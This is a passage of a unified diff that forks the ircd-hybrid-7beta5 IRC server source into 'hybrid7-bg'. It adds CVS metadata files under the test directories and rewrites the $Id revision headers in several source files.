+++ hybrid7-bg/src/test/CVS/Root	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/src/test/data/CVS/Entries hybrid7-bg/src/test/data/CVS/Entries
--- ircd-hybrid-7beta5/src/test/data/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/test/data/CVS/Entries	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+D
diff -uNrd ircd-hybrid-7beta5/src/test/data/CVS/Repository hybrid7-bg/src/test/data/CVS/Repository
--- ircd-hybrid-7beta5/src/test/data/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/test/data/CVS/Repository	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+hybrid7-bg/src/test/data
diff -uNrd ircd-hybrid-7beta5/src/test/data/CVS/Root hybrid7-bg/src/test/data/CVS/Root
--- ircd-hybrid-7beta5/src/test/data/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/test/data/CVS/Root	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/src/test/newconf/CVS/Entries hybrid7-bg/src/test/newconf/CVS/Entries
--- ircd-hybrid-7beta5/src/test/newconf/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/test/newconf/CVS/Entries	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+D
diff -uNrd ircd-hybrid-7beta5/src/test/newconf/CVS/Repository hybrid7-bg/src/test/newconf/CVS/Repository
--- ircd-hybrid-7beta5/src/test/newconf/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/test/newconf/CVS/Repository	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+hybrid7-bg/src/test/newconf
diff -uNrd ircd-hybrid-7beta5/src/test/newconf/CVS/Root hybrid7-bg/src/test/newconf/CVS/Root
--- ircd-hybrid-7beta5/src/test/newconf/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/test/newconf/CVS/Root	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/src/test/reference/CVS/Entries hybrid7-bg/src/test/reference/CVS/Entries
--- ircd-hybrid-7beta5/src/test/reference/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/test/reference/CVS/Entries	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+D
diff -uNrd ircd-hybrid-7beta5/src/test/reference/CVS/Repository hybrid7-bg/src/test/reference/CVS/Repository
--- ircd-hybrid-7beta5/src/test/reference/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/test/reference/CVS/Repository	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+hybrid7-bg/src/test/reference
diff -uNrd ircd-hybrid-7beta5/src/test/reference/CVS/Root hybrid7-bg/src/test/reference/CVS/Root
--- ircd-hybrid-7beta5/src/test/reference/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/src/test/reference/CVS/Root	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/src/tools.c hybrid7-bg/src/tools.c
--- ircd-hybrid-7beta5/src/tools.c	Mon Feb 26 08:21:11 2001
+++ hybrid7-bg/src/tools.c	Tue Jun  5 12:35:46 2001
@@ -5,7 +5,7 @@
  *
  * adrian chadd <adrian@creative.net.au>
  *
- * $Id: tools.c,v 7.17 2001/02/26 13:21:11 db Exp $
+ * $Id: tools.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 
 #include <assert.h>
diff -uNrd ircd-hybrid-7beta5/src/vchannel.c hybrid7-bg/src/vchannel.c
--- ircd-hybrid-7beta5/src/vchannel.c	Sat May 12 22:55:14 2001
+++ hybrid7-bg/src/vchannel.c	Tue Jun  5 12:35:46 2001
@@ -17,7 +17,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: vchannel.c,v 7.49 2001/05/13 02:55:14 db Exp $
+ * $Id: vchannel.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
  */
 
 #include "tools.h"
diff -uNrd ircd-hybrid-7beta5/src/version.c.SH hybrid7-bg/src/version.c.SH
--- ircd-hybrid-7beta5/src/version.c.SH	Thu Dec 28 00:42:17 2000
+++ hybrid7-bg/src/version.c.SH	Tue Jun  5 12:35:46 2001
@@ -1,6 +1,6 @@
 #!/bin/sh
 
-# $Id: version.c.SH,v 7.17 2000/12/28 05:42:17 lusky Exp $ 
+# $Id: version.c.SH,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $ 
 
 spitshell=cat
 package=IRC
diff -uNrd ircd-hybrid-7beta5/src/whowas.c hybrid7-bg/src/whowas.c
--- ircd-hybrid-7beta5/src/whowas.c	Mon Mar  5 21:05:44 2001
+++ hybrid7-bg/src/whowas.c	Tue Jun  5 12:35:46 2001
@@ -16,7 +16,7 @@
 *   along with this program; if not, write to the Free Software
 *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 *
-*   $Id: whowas.c,v 7.12 2001/03/06 02:05:44 androsyn Exp $
+*   $Id: whowas.c,v 1.1.1.1 2001/06/05 16:35:46 demond Exp $
 */
 
 #include <sys/types.h>
